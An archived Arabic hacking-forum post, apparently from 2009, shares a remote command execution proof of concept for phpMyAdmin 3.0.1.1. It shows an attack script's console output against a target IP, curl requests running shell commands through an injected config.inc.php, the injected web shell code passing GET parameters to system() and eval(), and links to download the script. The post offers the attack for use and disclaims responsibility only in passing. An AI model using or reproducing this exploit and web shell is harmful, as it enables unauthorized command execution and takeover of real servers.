:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   phpMyAdmin ريموت كومند !! PoC (http://www.vbspiders.com/vb/t13798.html)

Spiral 06-26-2009 09:32 AM

phpMyAdmin ريموت كومند !! PoC
 
1 مرفق
الســـــلام عليكم شباب ...

http://farm4.static.flickr.com/3287/...ecc214.jpg?v=0

ظهرت ثغره قوية البارحة للPhpMyAdmin بلميل وورم مع انه صعب وجود اي ثغره فعاله كPoC/exploit لبرنامج مفتوح المصدر وشهير جدا ك PhpMyAdmin .

والجميل بلثغره انه مازالت امكانية وجود ثغرات ريموت كومند ( remote command execution ) او هيب اوفر فلو ( heap overflow ) او حتى سيكيول انجكشن ك ( xp_cmdshell - cmd - etc ) .

وطبعا حصريا لشباب منتدى سيكيورتي رولز وصلني البارحة من صديق عزيز ريموت كومند للثغره بحيث نقدر من خلال الشل كود هذا نقوم بإختراق السيرفر ( نبرء ذمتي وذمة الشباب من اي عملية اختراق عربية )

كود PHP:

./SEC-R1Z_ _ _ _  _ _ _   _ _ _ _ _ _ _ _ _ _ _ _ _ __  
  
/ /_ _ _ _ /   _ _\/   _ _ /\        \<   |/_ _ _ _ /   
    \
_ _ _ _/  /_ _ /  /    __ |  ()   / |  |   /   /
   \
_ _ _ _/  /_ _ /  /    |__||      /  |  |  /   / 
    
_ _ _ _\  \_ _ \  \2_0_0_9 |      \  |  | /   /_ _  
  
/_ _ _ _ __ _ _/\ _ _ _ /  |__|\ __\ |__|/./J0_ _\_

[b0x@r1z ~]./phpMyAdmin-sec-r1z.sh
usage
: ./phpMyAdmin-sec-r1z.sh 
i
.e.: ./phpMyAdmin-sec-r1z.sh http://target.tld/phpMyAdmin/

[b0x@r1z ~]./phpMyAdmin-sec-r1z.sh http://172.16.211.10/phpMyAdmin-3.0.1.1/
[+] checking if phpMyAdmin exists on URL provided ...
[+] 
phpMyAdmin ****** and form token received successfullyGood!
[+] 
attempting to inject phpinfo() ...
[+] 
successphpinfo() injected successfullyoutput saved on /tmp/phpMyAdmin-sec-r1z.sh.9217.phpinfo.r1z.html
[+] you *shouldnow be able to remotely run shell commands and PHP code using your browseri.e.:
    
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/
    
http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?p=phpinfo();
    
please send any feedback/improvements for this script to unknown.pentestergmail.com

[b0x@r1z ~]curl "http://172.16.211.10/phpMyAdmin-3.0.1.1//config/config.inc.php?c=ls+-l+/"
total 96
drwxr
-xr-x   2 root   root  4096 Mar 11 10:12 bin
drwxr
-xr-x   3 root   root  4096 May  6 10:01 boot
drwxr
-xr-x  15 root   root 14300 Jun  5 09:02 dev
drwxr
-xr-x 147 root   root 12288 Jun  5 09:02 etc
drwxr
-xr-x   3 root   root  4096 Oct 18  2008 home
drwxr
-xr-x   2 root   root  4096 Jul  2  2008 r1z 

طبعا السكربت مو برمجتي وماله علاقه بمنتدانا ! فقط للتنويه

اللحين بعد تشغيل السكربت لل

كود PHP:

/config/config.inc.php 

تم حقن الايفل كود حقنا ( السورس كود )

كود PHP:

<?php
/*
 * Generated configuration file
 * Generated by: phpMyAdmin 3.0.1.1 setup script by Michal Čihař <michal@cihar.com>
 * Version: $Id: setup.php 11423 2008-07-24 17:26:05Z lem9 $
 * Date: Tue, 09 Jun 2009 14:13:34 GMT
 */

/* Servers configuration */
$i 0;

/* Server  (config:root) [1] */
$i++;
$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo
'<pre>';system($_GET['c']);echo '</pre>';}if($_GET['p']){echo
'<pre>';eval($_GET['p']);echo '</pre>';};//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';

/* End of servers configuration */

?>

باسوورد الباش سكربت
www.sec-r1z.com

http://www.youtube.com/watch?v=-t5xWuCYhlw

رابط الفيديو مضغوط اول شي rar ومن ثم zip لاجل حجمه بلتحميل ...

كود PHP:

http://rapidshare.com/files/243217562/_sec-r1z.com.zip 

تحياتي .

يرجى ذكر المصدر عند النقل
SecurityRules

www.sec-r1z.com

منقووول


الساعة الآن 04:59 PM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0